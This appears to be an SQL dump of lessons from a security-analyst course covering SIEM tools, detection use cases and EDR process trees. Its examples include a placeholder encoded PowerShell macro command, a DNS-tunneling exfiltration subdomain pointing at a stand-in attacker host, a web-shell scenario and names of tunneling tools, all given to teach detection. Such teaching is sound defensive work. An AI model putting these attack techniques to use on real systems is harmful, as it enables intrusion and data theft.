(573, 225, '## Market Leaders: Splunk vs. Microsoft Sentinel\n\nIn the SIEM world, there are many players, but two dominate the enterprise space in 2024: **Splunk** and **Microsoft Sentinel**. As an analyst, you will likely work with one of these.\n\n### Splunk: The Heavyweight Champion\n\n**Splunk** is the \"Google for Data\". It started as a log search tool and evolved into a massive Security analytics platform.\n\n#### Key Features\n*   **SPL (Splunk Processing Language)**: A powerful, pipe-based query language (similar to Unix piping).\n    *   `index=firewall src_ip=10.0.0.1 | stats count by dest_port | sort - count`\n    *   Mastering SPL is a resume superpower.\n*   **Schema on Read**: Splunk doesn\'t need to understand the data structure *when it indexes it*. You can define fields later during the search. This is incredibly flexible.\n*   **Ecosystem**: Thousands of \"Apps\" and \"Add-ons\" for every vendor imaginable.\n\n#### Pros & Cons\n*   [+] **Mature**: Extensive documentation, community, and feature set.\n*   [+] **Flexible**: Can handle any type of data, not just security (DevOps, Business Analytics).\n*   [-] **Cost**: Historically very expensive (often charged by GB ingested).\n*   [-] **Complexity**: Requires dedicated engineers to manage the infrastructure (Indexers, Search Heads, Forwarders).\n\n### Microsoft Sentinel: The Cloud Native Challenger\n\n**Microsoft Sentinel** (formerly Azure Sentinel) is a cloud-native SIEM + SOAR solution built directly into Azure.\n\n#### Key Features\n*   **KQL (Kusto Query Language)**: The query language used by Sentinel. It is extremely fast, especially on large datasets.\n    *   `FirewallLogs | where SourceIP == \"10.0.0.1\" | summarize count() by DestinationPort | order by count_ desc`\n*   **Cloud Native**: No servers to manage. You don\'t patch Sentinel; you just enable it. 
It scales elastically.\n*   **Microsoft Integration**: Ingesting logs from Office 365, Azure AD (Entra ID), and Defender for Endpoint is often \"one-click\" and sometimes free.\n\n#### Pros & Cons\n*   [+] **Ease of Use**: Setup takes minutes, not months.\n*   [+] **Integration**: Unbeatable if your company is a \"Microsoft Shop\" (uses O365, Azure, Windows).\n*   [+] **Cost Model**: Pay-as-you-go.\n*   [-] **Cloud Locked**: While it *can* ingest AWS/Google logs, it works best in Azure.\n*   [-] **Younger**: Less community content and fewer mature 3rd-party integrations compared to Splunk.\n\n### Other Notable Players\n*   **Elastic Security (ELK)**: The open-source giant. Highly customizable, free versions available, favored by engineering-heavy teams.\n*   **QRadar (IBM)**: A legacy enterprise player. Very strong on flow analytics and strict correlation rules.\n*   **Exabeam/Securonix**: Leaders in the UEBA (User Behavior Analytics) space, often used alongside other log managers.\n\n### Which one should you learn?\n*   Learn the **concepts** (Aggregation, Normalization, Correlation), not just the tool. The logic \"Find failed logins\" is the same in SPL and KQL.\n*   However, knowing **SPL** is currently the most requested skill in job descriptions, while **KQL** is the fastest growing.\n\n### Comparison Summary\n| Feature | Splunk | Microsoft Sentinel |\n| :--- | :--- | :--- |\n| **Deployment** | On-Prem, Cloud, or Hybrid | Cloud Only (SaaS) |\n| **Query Language** | SPL | KQL |\n| **Cost Model** | Volume/Workload pricing | Pay-as-you-go (Data/Compute) |\n| **Best For** | Complex, multi-cloud, hybrid enterprises | Azure/Microsoft-centric organizations |', 'markdown', 15, '2025-12-26 22:35:58', '2025-12-29 15:04:12'),
(574, 226, '## The Open Source Rebel: The ELK Stack (Elastic Stack)\n\nNot every company has the budget for Splunk or Sentinel. Enter the **ELK Stack**, the world\'s most popular open-source log management platform.\n\nELK stands for **E**lasticsearch, **L**ogstash, and **K**ibana. (Though now it includes **B**eats, so sometimes it\'s called the *Elastic Stack*).\n\n### The Components\n\n#### 1. Beats (The Shippers)\nLightweight data shippers that you install on your servers (Agents).\n*   **Filebeat**: Tails log files. Use this for Apache, Nginx, or custom app logs.\n*   **Winlogbeat**: Ships Windows Event Logs.\n*   **Packetbeat**: Sniffs network traffic (like Wireshark) and sends metadata.\n*   **Auditbeat**: Linux audit framework data (File Integrity Monitoring).\n*   *Role*: \"Go get the data and push it.\"\n\n#### 2. Logstash (The Plumber)\nThe heavy-duty processing pipeline. Logstash receives data from Beats (or Syslog), parses it, filters it, and transforms it.\n*   **Input**: Receive data on TCP 5044.\n*   **Filter**: This is where the magic happens.\n    *   *Grok*: A plugin to parse unstructured text into fields using Regex comparisons.\n    *   *GeoIP*: Adds Latitude/Longitude based on IP address.\n    *   *Drop*: Discard noise (e.g., \"Don\'t store debug logs\").\n*   **Output**: Send to Elasticsearch.\n*   *Role*: \"Clean, format, and enrich the data.\"\n\n#### 3. Elasticsearch (The Brain / Database)\nA distributed, RESTful search and analytics engine. It is a NoSQL database that stores data in JSON format.\n*   It is built for **speed**. You can search through billions of documents in milliseconds.\n*   It uses an \"Inverted Index\" (like the index at the back of a textbook). It doesn\'t scan every row; it looks up the word \"Error\" and instantly knows which rows contain it.\n*   *Role*: \"Store the data and find it fast.\"\n\n#### 4. Kibana (The Face)\nThe visualization dashboard.\n*   This is where the Analyst lives. 
You query Elasticsearch and visualize the results.\n*   Create pie charts, line graphs, maps, and data tables.\n*   **Canvas**: A feature to create pixel-perfect infographic presentations for management.\n\n### Elastic Security\nIn recent years, Elastic has added a dedicated \"Security\" app on top of ELK.\n*   **Detection Engine**: Runs automated rules (like Splunk correlation matches).\n*   **Prebuilt Rules**: Elastic provides hundreds of open detection rules mapped to MITRE ATT&CK.\n*   **Endpoint Security**: Elastic Agent can now prevent malware, not just log it.\n\n### Why use ELK?\n1.  **Cost**: The core is open source (Free). You pay for hardware/cloud hosting, but no licensing fees for data volume.\n2.  **Flexibility**: You have total control over every configuration file. You can build exactly what you need.\n3.  **Community**: Massive community support.\n\n### The Trade-off\nELK is \"Free as in Puppies,\" not \"Free as in Beer.\"\n*   Managing an Elasticsearch cluster is **hard**.\n*   Sharding, replication, heap memory management, and upgrades require specialized DevOps skills.\n*   If your cluster crashes during an attack, you are blind, and there is no 1-800 number to call (unless you pay for Enterprise support).\n\n### Analyst Workflow in Kibana\n1.  **Discover Tab**: Review raw logs. Filter by `event.category: \"authentication\"`.\n2.  **Visualize**: Create a \"Vertical Bar\" chart of `user.name` where `event.outcome: \"failure\"`.\n3.  **Dashboard**: Pin that chart to your \"Morning Coffee\" dashboard to spot anomalies instantly.', 'markdown', 15, '2025-12-26 22:35:58', '2025-12-29 15:04:12'),
(575, 227, '## Wazuh: The Modern Open SIEM\n\nWhile ELK is a general-purpose data platform that *can* be used for security, **Wazuh** is a platform built *specifically* for security from day one. It often sits on top of the ELK stack (using Elasticsearch for storage) but replaces the heavy lifting of Logstash/Beats with its own specialized agents.\n\n### Architecture\n\n#### 1. The Wazuh Agent\nInstalled on endpoints (Windows, Linux, macOS). It is far more powerful than a simple log shipper.\n*   **Log Collection**: Reads system logs and application logs.\n*   **FIM (File Integrity Monitoring)**: It takes cryptographic hashes (MD5/SHA256) of critical files. If a hacker modifies `/etc/passwd` or `system32.dll`, Wazuh alerts immediately.\n*   **Rootkit Detection**: Scans for hidden processes, hidden ports, and anomalous system calls.\n*   **Vulnerability Detection**: Compares installed software versions against the CVE database. \"Hey, you have Chrome version 80 installed; it has 5 critical vulnerabilities.\"\n*   **Active Response**: Can execute scripts to block an attack. (e.g., \"If source IP logs in 10 times fail -> Add IP to Firewall Drop rule\").\n\n#### 2. The Wazuh Server\n*   Receives data from agents.\n*   **Decoders**: Parses raw logs into fields.\n*   **Rules Engine**: The core strength of Wazuh. It has thousands of pre-built rules mapped to PCI-DSS, HIPAA, GDPR, and MITRE ATT&CK.\n    *   *Rule Level*: Alerts are graded 1-15.\n    *   Level 3: \"Login success\" (Informational).\n    *   Level 12: \"Suspicious shell spawned\" (Critical).\n\n#### 3. The Wazuh Dashboard (Indexer)\n*   Historically based on Kibana (OpenSearch Dashboards).\n*   Provides a beautiful UI to visualize FIM changes, compliance scores, and threat alerts.\n\n### Wazuh vs. 
Traditional SIEM\nWazuh is technically an **XDR (Extended Detection and Response)** solution because it does more than just logs—it monitors the *state* of the endpoint.\n\n*   **Traditional SIEM**: \"I saw a log that says a file changed.\"\n*   **Wazuh**: \"I saw the file change, here is the diff of the content, here is the user who did it, and by the way, that user is running a vulnerable version of Sudo.\"\n\n### Use Case Example: Detecting a Web Shell\n1.  **Attacker**: Uploads `shell.php` to your web server (Apache).\n2.  **Wazuh FIM**: Detects a new file creation in `/var/www/html/`. Checks hash.\n3.  **Wazuh Rule**: \"New file created in web directory with PHP extension\" -> **Alert Level 7**.\n4.  **Attacker**: Accesses the shell. Apache logs 200 OK for `shell.php`.\n5.  **Wazuh Log Analysis**: Sees web request to the newly created file.\n6.  **Active Response**: Triggers a firewall-drop command for the attacker\'s IP.\n\n### Why Analysts Love Wazuh\n*   **Pre-tuned**: It comes out of the box with reasonable defaults. you don\'t have to write a rule to detect \"SSH Brute Force\"—it\'s already there.\n*   **Compliance View**: It has a dedicated view for \"PCI DSS\". You can click it and see exactly which requirements you are failing based on the logs.\n*   **Endpoint Visibility**: It gives you deep insight into the OS, not just the logs the OS decides to print.\n\n### Lab Insight\nIn the upcoming labs, you will likely interface with a SIEM dashboard. Whether it is Splunk, ELK, or Wazuh, remember: **The logic is the same.** You are looking for anomalies, correlating events across time, and validating the generated alerts.', 'markdown', 15, '2025-12-26 22:35:58', '2025-12-29 15:04:12'),
(576, 228, '## Module 22 Review\nYou have completed the SIEM Fundamentals module. You should now understand:\n1.  **Aggregation, Normalization, Correlation**.\n2.  The difference between **Syslog** vs **Agent** ingestion.\n3.  How to read a normalized log vs a raw log.\n4.  The landscape of tools: Splunk, Sentinel, ELK, Wazuh.\n\nProceed to the next module to apply this knowledge in practical Use Cases.', 'markdown', 15, '2025-12-26 22:35:58', '2025-12-29 14:17:57'),
(577, 231, '## Use Case 1: Brute Force Attack (Easy)\n\n**Scenario**: An attacker is trying to guess a user\'s password to gain unauthorized access to the network. This is often the first step in an attack called \"Initial Access.\"\n\n### The Logic\nA brute force attack generates a distinct pattern: **Many Failures followed by (potentially) a Success**.\n\n### 1. The Data Sources\n*   **Source**: Windows Event Logs (Security) or Linux `/var/log/auth.log` or SSH logs.\n*   **Key Fields**:\n    *   `Event ID`: 4625 (Failure), 4624 (Success).\n    *   `Logon Type`: 3 (Network), 10 (RDP).\n    *   `Account Name`: The target user.\n    *   `Source IP`: The attacker\'s IP.\n\n### 2. The Pattern (Signatures)\n*   **Standard Brute Force**:\n    *   One Source IP targeting One User Account.\n    *   High frequency (> 10 failures in 1 minute).\n*   **Password Spraying** (Stealthier):\n    *   One Source IP targeting *Many* different User Accounts.\n    *   Tries \"Password123\" against User A, then User B, then User C.\n    *   Avoids locking out a single account.\n*   **Reverse Brute Force**:\n    *   Many Source IPs (Botnet) targeting One User Account.\n\n### 3. The SIEM Rule (Pseudocode)\n```sql\nAlert IF:\n    Event = \"Failed Login\"\n    AND\n    Count > 20\n    AND\n    Time_Window = 5 minutes\n    AND\n    Same Source_IP\n```\n\n### 4. Investigation Steps (The Playbook)\nWhen you see this alert, here is your workflow:\n1.  **Check the Username**: Does the account exist? Or is it `admin`, `root`, `test`? (Non-existent accounts usually imply an automated script).\n2.  **Check the Source IP**: Is it internal or external?\n    *   *Internal*: Could be a misconfigured service or script retry. Contact the machine owner.\n    *   *External*: Check Threat Intelligence (VirusTotal/AbuseIPDB). Is this a known bad IP?\n3.  **Check for Success**: **CRITICAL**. 
Did they eventually succeed?\n    *   Query: `source_ip=Attacker_IP AND action=Success`.\n    *   If **NO**: The firewall/account lockout did its job. Block the IP.\n    *   If **YES**: **Incident Declared**. The attacker is inside. Reset password immediately, isolate the host, and look for what they did next.\n\n### 5. False Positives\n*   User changed their Active Directory password, but their phone is still trying to sync email with the old password.\n*   A service account (cron job) with hardcoded credentials failing repeatedly.\n\n### 6. Real World Example\n`Oct 21 04:00:01 sshd[123]: Failed password for root from 192.168.1.105 port 4422 ssh2`\n`Oct 21 04:00:02 sshd[123]: Failed password for root from 192.168.1.105 port 4422 ssh2`\n`Oct 21 04:00:03 sshd[123]: Failed password for root from 192.168.1.105 port 4422 ssh2`\n`Oct 21 04:00:04 sshd[123]: Accepted password for root from 192.168.1.105 port 4422 ssh2`\n**Verdict**: Successful Brute Force. Priority Critical.', 'markdown', 15, '2025-12-26 22:41:26', '2025-12-29 15:05:03'),
(578, 232, '## Use Case 2: Malware Beaconing (Easy)\n\n**Scenario**: A user clicks a malicious link. Malware installs on their laptop. The malware needs instructions, so it \"phones home\" to the attacker\'s Command & Control (C2) server. This checking-in process is called **Beaconing**.\n\n### The Logic\nBeaconing is automated. Computers form patterns (heartbeats); humans do not.\n\n### 1. The Data Sources\n*   **Source**: Firewall Logs, Proxy Logs, or DNS Logs.\n*   **Key Fields**:\n    *   `src_ip`: The infected laptop.\n    *   `dest_ip` or `dest_domain`: The C2 server.\n    *   `bytes_sent/received`: Usually small (just asking \"Any commands for me?\").\n    *   `frequency/interval`: The time between connections.\n\n### 2. The Pattern (Signatures)\n*   **Regularity**: Connection to the same IP every 60 seconds (or exactly 5 minutes, etc.).\n*   **Long Duration**: This connection happens 24/7, even when the user is asleep.\n*   **Jitter**: Sophisticated malware adds \"jitter\" (random delay) to hide. E.g., 60s, then 65s, then 58s.\n\n### 3. The SIEM Rule (Pseudocode)\nDetection often requires statistical analysis, not just simple matching.\n```sql\nAlert IF:\n    Same Source_IP connecting to Same Dest_IP\n    Count > 50 times in 24 hours\n    AND\n    Standard_Deviation(Time_Between_Connections) is Low (< 5 seconds)\n```\n\n### 4. Investigation Steps (The Playbook)\n1.  **Analyze the Destination**:\n    *   Is the domain `google.com` (benign) or `x83js92.ru` (suspicious)?\n    *   Is the destination IP hosting a known valid service (Microsoft Update) or a cheap VPS?\n    *   Use **Whois** to check domain age. (Newly registered domains < 30 days old are high risk).\n2.  **Analyze the Payload**:\n    *   Check Proxy logs. User-Agent string?\n    *   Is it `Mozilla` (Browser) or `Python-requests` (Script)?\n3.  **Check Endpoint**:\n    *   Identify the process making the connection.\n    *   Is `chrome.exe` connecting? 
Or is it `powershell.exe` connecting to the internet? (PowerShell connecting to a Russian IP is almost certainly bad).\n\n### 5. False Positives\n*   Legitimate software updates (Adobe Updater checks in every hour).\n*   NTP (Time sync) traffic.\n*   Telemetry from legitimate apps (Spotify \"I\'m still playing\" signals).\n\n### 6. Mitigation\n*   **Block**: Add the C2 IP/Domain to the Firewall blocklist.\n*   **Isolate**: Take the infected machine off the network.\n*   **Reimage**: Malware often has persistence mechanisms that are hard to remove partially; wiping the machine is safest.', 'markdown', 15, '2025-12-26 22:41:26', '2025-12-29 15:05:03'),
(579, 233, '## Use Case 3: Impossible Travel (Medium)\n\n**Scenario**: A user\'s credentials have been compromised (stolen/phished). The attacker is logging in from their own country, while the legitimate user is logging in from the office.\n\n### The Logic\nA physical person cannot move faster than the speed of an airplane.\n\n### 1. The Data Sources\n*   **Source**: Identity Provider Logs (Azure AD, Okta, PingIdentity) or VPN Logs.\n*   **Key Fields**:\n    *   `User ID`: The account.\n    *   `Source IP`: The login location.\n    *   `GeoIP Data`: The SIEM enriches the IP with City/Country data.\n    *   `Timestamp`.\n\n### 2. The Pattern\n*   Login 1: London, UK at 14:00.\n*   Login 2: New York, USA at 14:30.\n*   Distance: 3,450 miles.\n*   Time Delta: 30 minutes.\n*   Required Speed: 6,900 mph. (Supersonic).\n*   **Conclusion**: Two different people are using the same credentials.\n\n### 3. The SIEM Rule (Pseudocode)\n```sql\nAlert IF:\n    Login Success for User U from Location A at Time T1\n    AND\n    Login Success for User U from Location B at Time T2\n    AND\n    (Distance(A, B) / (T2 - T1)) > 600 mph\n```\n\n### 4. Investigation Steps (The Playbook)\n1.  **Verify the GeoIP**: Geo-location databases are not 100% accurate.\n    *   Is the IP *actually* in Russia, or is it a corporate VPN exit node that just *registers* to a HQ in Russia?\n2.  **Check for VPN Usage**:\n    *   Did the user turn on their corporate VPN? This might make them appear to \"jump\" from home to the datacenter instantly.\n3.  **Contact the User**: \"Hey, are you currently in Lagos, Nigeria?\"\n4.  **Review Activity**:\n    *   What did the \"Remote\" session do? Did they just check email, or did they download the entire \"Payroll\" folder?\n\n### 5. False Positives\n*   **Mobile + WiFi**: A user is on WiFi (IP A), then switches to 5G (IP B). 
IP B might geolocate to a carrier tower 300 miles away.\n*   **Cloud Proxies**: Zscaler or other cloud security tools can make traffic appear to originate from regional hubs.\n\n### 6. Remediation\n*   **Force Password Reset**: Invalidate the compromised credentials.\n*   **Revoke Sessions**: Kill active tokens so the attacker is kicked out immediately.\n*   **Enable MFA**: If not already on, this stops 99% of credential theft attacks.', 'markdown', 15, '2025-12-26 22:41:26', '2025-12-29 15:05:03'),
(580, 234, '## Use Case 4: Privilege Escalation (Medium)\n\n**Scenario**: An attacker has gained access to a standard user account (\"Bob\"). Now they want to become an Administrator to install rootkits, dump passwords, or delete backups. This technique is **Privilege Escalation**.\n\n### The Logic\nStandard users should not be added to high-privilege groups. Administrative group formatting changes are rare and sensitive.\n\n### 1. The Data Sources\n*   **Source**: Windows Security Event Logs (Active Directory Domain Controller).\n*   **Key Fields**:\n    *   `Event ID`: **4728** (Member added to security-enabled global group), **4732** (Member added to security-enabled local group), **4756** (Member added to security-enabled universal group).\n    *   `Target Account`: The user being promoted (e.g., \"Bob\").\n    *   `Target Group`: The group being modified (e.g., \"Domain Admins\", \"Enterprise Admins\", \"Schema Admins\").\n    *   `Subject Account`: The user *doing* the adding (who made the change?).\n\n### 2. The Pattern\n*   Any addition to highly sensitive groups (Domain Admins) should be flagged.\n*   Frequent failures to add users to groups (Event 4728 failures) might indicate an attacker guessing permissions.\n\n### 3. The SIEM Rule (Pseudocode)\n```sql\nAlert IF:\n    Event_ID IN (4728, 4732, 4756)\n    AND\n    Target_Group IN (\"Domain Admins\", \"Administrators\", \"Enterprise Admins\")\n```\n\n### 4. Investigation Steps (The Playbook)\n1.  **Verify the Change Request**: Check the ticketing system (Jira/ServiceNow). Is there an approved ticket to make Bob an Admin?\n2.  **Check the Executor**: Who added Bob?\n    *   Was it a known Admin account?\n    *   Was it a Service Account? (Suspicious).\n    *   Was it Bob adding himself? (High Confidence Compromise).\n3.  **Time Context**:\n    *   Was this done at 3:00 AM on a Saturday? (Suspicious).\n    *   Was it done during business hours? (More likely legitimate).\n\n### 5. 
False Positives\n*   Legitimate IT operations. New Sysadmin hired, added to groups.\n*   Automated provisioning scripts (e.g., Identity Management systems) rotating memberships.\n\n### 6. Real World Risk\nIf an attacker reaches \"Domain Admin\", it is typically \"Game Over\". They can access every computer in the company, decrypt all passwords, and even create \"Golden Tickets\" to maintain access forever, even if you reset their password. Speed of detection here is critical.', 'markdown', 15, '2025-12-26 22:41:26', '2025-12-29 15:05:03'),
(581, 235, '## Use Case 5: DNS Tunneling (Hard)\n\n**Scenario**: A firewall blocks all traffic (HTTP, SSH, FTP) except for DNS (Port 53). Attackers know DNS must be open for the internet to work. They encode stolen data inside DNS queries to sneak it past the firewall. This is **DNS Tunneling**.\n\n### The Logic\nDNS is meant for address lookups (Phonebook). It is not meant for data transfer. Tunneling creates data that looks essentially different from normal lookups.\n\n### 1. The Data Sources\n*   **Source**: DNS Server Logs, Firewall Logs (Port 53), or Passive DNS sensors (Zeek).\n*   **Key Fields**:\n    *   `Query`: The domain being requested (`xyz.example.com`).\n    *   `Query Type`: A, TXT, CNAME, NULL, MX.\n    *   `Response Size`: Size of the answer.\n\n### 2. The Pattern\n*   **Long Subdomains**:\n    *   Normal: `www.google.com`\n    *   Tunneling: `base64_packet1_part2_secret_data.attacker.com` -> `cGFzc3dvcmQxMjMK.attacker.com`.\n    *   The attacker controls the `attacker.com` authoritative nameserver, which logs the incoming query (and thus receives the stolen data).\n*   **High Volume**:\n    *   A normal user makes ~1000 DNS queries a day.\n    *   Tunneling requires thousands of queries to transfer a small file because each query can only hold a few bytes of data.\n*   **Rare Record Types**:\n    *   Using `TXT` or `NULL` records to pack more data into the response (C2 commands coming back).\n\n### 3. The SIEM Rule (Pseudocode)\n```sql\nAlert IF:\n    Length(DNS_Query) > 180 characters\n    OR\n    Count(DNS_Queries) to Same_Root_Domain > 1000 in 1 hour\n    OR\n    Unusual_Record_Type (TXT, NULL) with High Entropy (Randomness)\n```\n\n### 4. Investigation Steps (The Playbook)\n1.  **Decode the Subdomain**:\n    *   Copy the subdomain string. Try Base64 or Hex decoding it.\n    *   If it decodes to \"Confidential_Q3_Report.pdf\", you have confirmed data exfiltration.\n2.  
**Check the Domain Reputation**:\n    *   Is the root domain (`attacker.com`) known?\n    *   Does it resolve to a legitimate site?\n3.  **Identify the Endpoint**:\n    *   Which machine is making the requests? Isolate it.\n    *   Check for tunneling tools like `dnscat2` or `iodine` running in the process list.\n\n### 5. False Positives\n*   **CDN / Anti-Virus Lookups**: McAfee/Sophos use DNS to check file hashes. These queries look like `long_random_hash.sophosxl.net`. This is legitimate.\n*   **Content Delivery Networks (Akamai)**: Often use long, complex subdomains.\n\n### 6. Why it\'s \"Hard\"\nDistinguishing between a legitimate detailed DNS lookup (like an AV signature check) and a malicious tunnel requires entropy analysis (measuring the randomness of the string), which simple rule logic struggles with. It usually requires Machine Learning or statistical baselining.', 'markdown', 15, '2025-12-26 22:41:26', '2025-12-29 15:05:03'),
(582, 236, '## Module 23 Review\nYou have explored 5 critical SIEM Use Cases:\n1.  **Brute Force**: High volume failures.\n2.  **Beaconing**: Periodic C2 heartbeat.\n3.  **Impossible Travel**: Geo-velocity anomalies.\n4.  **Privilege Escalation**: Group changes and sudo abuse.\n5.  **DNS Tunneling**: Exfiltration via Port 53.\n\nThese rules form the baseline of most SOC detection strategies.', 'markdown', 15, '2025-12-26 22:41:26', '2025-12-29 14:17:57'),
(583, 241, '## Endpoint Detection and Response (EDR)\n\n**EDR** is the flight recorder for endpoints (laptops, servers, workstations). While a SIEM looks at the \"network\" and \"logs,\" an EDR looks at **execution** and **behavior**.\n\n### The Old World: Antivirus (EPP)\nTraditional Antivirus (AV), or Endpoint Protection Platforms (EPP), relied on **Signatures**.\n*   **The Method**: Compare a file\'s hash (SHA256) against a database of known bad files.\n*   **The Flaw**: If an attacker changes *one bit* of the file, the hash changes, and the AV misses it.\n*   **The Blind Spot**: AV cannot see \"Fileless Malware\" (e.g., PowerShell running a malicious script in memory). The file `powershell.exe` is legitimate, so AV ignores it.\n\n### The New World: EDR\nEDR assumes that **prevention will fail**. Its goal is **Detection** and **Visibility**.\nEDR records *everything* that happens on the device:\n1.  **Process Creation**: `cmd.exe` opened `powershell.exe`.\n2.  **Network Connections**: `powershell.exe` connected to `1.2.3.4`.\n3.  **File Modification**: `powershell.exe` wrote a file to `Temp`.\n4.  **Registry Changes**: `powershell.exe` added a generic Run key.\n\nBecause it records the *behavior*, it can detect attacks even if the malware file is brand new (Zero-Day).\n\n### Key Functions of EDR\n1.  **Continuous Monitoring**: Records activity 24/7, storing it either locally or in the cloud.\n2.  **Threat Hunting**: Allows analysts to query the database. \"Show me every computer that ran this specific PowerShell command.\"\n3.  **Automated Response**: \"If Ransomware behavior is detected, kill the process and isolate the machine.\"\n4.  
**Remote Shell**: Allows analysts to remotely log in to the machine to investigate (like SSH, but through the EDR cloud).\n\n### Why EDR is Critical for SOC 1\nAs a Tier 1 Analyst, you will spend 50% of your time in the EDR console.\n*   The SIEM tells you **\"Something happened.\"**\n*   The EDR tells you **\"EXACTLY what happened.\"**\n*   *Example*: SIEM says \"Virus Detected on Host A\". EDR shows you that the user downloaded `invoice.zip` from Gmail, opened it, which spawned `cmd.exe`, which ran a script.', 'markdown', 15, '2025-12-26 22:47:08', '2025-12-29 15:05:46'),
(584, 242, '## EDR vs. Legacy Antivirus: The Cage Match\n\nIt is important to clearly distinguish between these two technologies, even though marketing often blurs them.\n\n| Feature | Legacy Antivirus (AV) | Endpoint Detection & Response (EDR) |\n| :--- | :--- | :--- |\n| **Detection Basis** | **Signatures** (Matching known Bad) | **Behavior** (Matching suspicious Actions) |\n| **Visibility** | **Black Box**: \"I blocked a virus.\" (End of story) | **Flight Recorder**: \"I saw the user open Chrome, download X, run Y...\" |\n| **Fileless Attacks** | **Blind**: Cannot see in-memory attacks. | **Visible**: Sees memory allocation and script execution. |\n| **Response** | **Delete/Quarantine File** | **Isolate Host, Kill Process, Remote Shell** |\n| **Analyst Role** | Passive (Wait for alerts) | Active (Hunt and Investigate) |\n\n### The \"Next-Gen AV\" (NGAV)\nModern tools often combine both. CrowdStrike, SentinelOne, and Defender for Endpoint are actually **EPP (Prevention) + EDR (Detection)** in a single agent.\n*   They *do* block known malware (EPP).\n*   BUT they also record all activity for investigation (EDR).\n\n### Scenario: The PowerShell Attack\n1.  **Attack**: Hacker sends a Word Doc with a macro. The macro runs: `powershell.exe -enc <malicious_code>`.\n2.  **Legacy AV**: Scans `winword.exe` (Safe). Scans `powershell.exe` (Safe). **Result**: Infection.\n3.  **EDR**:\n    *   Sees `winword.exe` spawn `powershell.exe`. (Suspicious).\n    *   Sees `powershell.exe` make a network connection to a non-Microsoft IP. (Very Suspicious).\n    *   **Alerts**: \"Suspicious Process Chain from Word Document.\"\n    *   **Action**: Kills the PowerShell process tree.\n\n### Why \"Signatures\" are Dead\nAttackers use \"Polymorphism\". They automate their malware compilers to change the code structure every 10 seconds.\n*   To AV, it looks like a new file every time.\n*   To EDR, it looks like a program trying to encrypt the hard drive (Ransomware behavior). 
The behavior never changes.', 'markdown', 15, '2025-12-26 22:47:08', '2025-12-29 15:05:46');
INSERT INTO `lesson_content` (`id`, `task_id`, `content`, `content_type`, `reading_time_minutes`, `created_at`, `updated_at`) VALUES
(585, 243, '## The Process Tree: The DNA of an Attack\n\nIf you learn only one thing about EDR, let it be the **Process Tree** (or Parent-Child Relationship).\n\n### What is a Process?\nWhen you run a program (like Calculator), the Operating System creates a **Process**. It assigns it a **PID (Process ID)**.\n\n### Parent and Child\nProcesses do not appear out of thin air. They are spawned by other processes.\n*   **Parent**: The creator.\n*   **Child**: The created.\n\n**Normal Example**:\n1.  You double-click Chrome on your desktop.\n    *   Parent: `explorer.exe` (The Windows Desktop)\n    *   Child: `chrome.exe`\n2.  You open a PDF inside Chrome.\n    *   Parent: `chrome.exe`\n    *   Child: `AcrobatReader.exe`\n\n**Malicious Example**:\n1.  User opens an email attachment (`Invoice.docx`).\n    *   Parent: `outlook.exe`\n    *   Child: `winword.exe`\n2.  The document contains a malicious macro.\n    *   Parent: `winword.exe`\n    *   Child: `cmd.exe` (Command Prompt) **<-- RED FLAG**\n3.  The Command Prompt downloads malware.\n    *   Parent: `cmd.exe`\n    *   Child: `powershell.exe`\n\n### Visualizing the Tree\nEDR tools visualize this as a hierarchy DAG (Directed Acyclic Graph).\n```\nexplorer.exe (PID 1000)\n    |\n    |-- outlook.exe (PID 1200)\n         |\n         |-- winword.exe (PID 1300)  <-- \"Invoice.docx\"\n              |\n              |-- cmd.exe (PID 1400) <-- \"Active Malicious Content\"\n                   |\n                   |-- curl.exe (PID 1500)\n```\n\n### The Analyst\'s Job\nYour job is to look at this tree and ask: **\"Does this make sense?\"**\n*   Does Microsoft Word *need* to open the Command Prompt to show you a document? **No.**\n*   Does Adobe Reader *need* to run PowerShell to display a PDF? **No.**\n*   Does Chrome *need* to run the Calculator? **No.**\n\nThese illogical relationships are the **strongest indicators of compromise (IOCs)** in existence. 
They are harder for attackers to hide than file hashes or IP addresses.', 'markdown', 15, '2025-12-26 22:47:08', '2025-12-29 15:05:46'),
(586, 244, '## Reading Process Ancestry: Who is your Father?\n\nTo catch advanced attackers, you must understand **Ancestry**. It\'s not just about the immediate parent, but the \"Grandparent\" and the whole lineage.\n\n### The \"Grandparent\" Context\nSometimes, the immediate parent looks okay, but the context is wrong.\n**Example**:\n`powershell.exe` running a script.\n*   Make sense? Maybe. Admins use PowerShell all the time.\n*   **Context 1 (Good)**:\n    *   Grandparent: `services.exe` -> Parent: `svchost.exe` -> Child: `powershell.exe` (Running a scheduled maintenance task).\n*   **Context 2 (Bad)**:\n    *   Grandparent: `chrome.exe` -> Parent: `cmd.exe` -> Child: `powershell.exe` (User downloaded a script from the browser and ran it).\n\n### Orphaned Processes\nSometimes, the Parent dies before the Child.\n*   `cmd.exe` spawns `malware.exe`.\n*   `cmd.exe` closes/exits.\n*   `malware.exe` is still running.\nIn Windows, the Parent ID (PPID) technically points to a non-existent process. Modern EDRs track this linkage historically so you can still see who the *original* parent was.\n\n### Spoofing (PPID Spoofing)\nAdvanced attackers can trick Windows. They can tell the OS: \"Launch my malware, but pretend that `explorer.exe` is the parent, not my hacking tool.\"\n*   This is called **Parent PID Spoofing**.\n*   **Detection**: EDRs look for discrepancies between the *recorded* parent and the *start time* of the process. If a Child process claims to be born 5 minutes *before* its Parent started, verified spoofing is likely occurring.\n\n### Standard Ancestry (What is Normal?)\nYou need to know what \"Normal\" looks like to spot the \"Abnormal\".\n*   `svchost.exe`: Generic host for services. Should usually be spawned by `services.exe`.\n*   `lsass.exe`: Local Security Authority. Should be spawned by `wininit.exe`.\n*   `explorer.exe`: The user shell. 
Spawned by `userinit.exe`.\n\nIf you see `lsass.exe` spawned by `winword.exe`, you are looking at an attack (likely Credential Dumping).', 'markdown', 15, '2025-12-26 22:47:08', '2025-12-29 15:05:46'),
